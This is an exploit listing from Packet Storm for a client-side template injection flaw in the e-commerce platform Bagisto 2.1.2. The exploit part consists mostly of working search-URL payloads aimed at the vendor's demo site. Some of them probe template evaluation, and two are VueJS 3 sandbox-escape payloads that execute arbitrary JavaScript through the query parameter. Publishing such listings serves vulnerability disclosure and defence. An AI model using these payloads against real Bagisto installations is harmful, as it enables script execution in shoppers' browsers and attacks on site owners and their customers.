Bagisto 2.1.2 Client-Side Template Injection ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Bagisto 2.1.2 Client-Side Template Injection[6]
Authored by tmrswrr[7]

Bagisto version 2.1.2 suffers from a client-side template injection vulnerability.

SHA-256 | e1ff62be4046998d0d9a25cdf198a745f56d91c298fcef90a1de32459b4ba713

Change Mirror[11] Download[12]

        # Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)
# Date: 06/18/2024
# Exploit Author: tmrswrr
# Vendor Homepage: https://forums.bagisto.com/
# Version: 2.1.2
# Tested on: https://demo.bagisto.com/
https://demo.bagisto.com/bagisto-common/search?query={{7*7}}
49
https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}
A
https://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}
[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]
> Payloads for VueJS 3
https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}
https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}
> You will be see alert button

Login[13] or Register[14] to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[119]
Hosting By
Rokasec[120]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"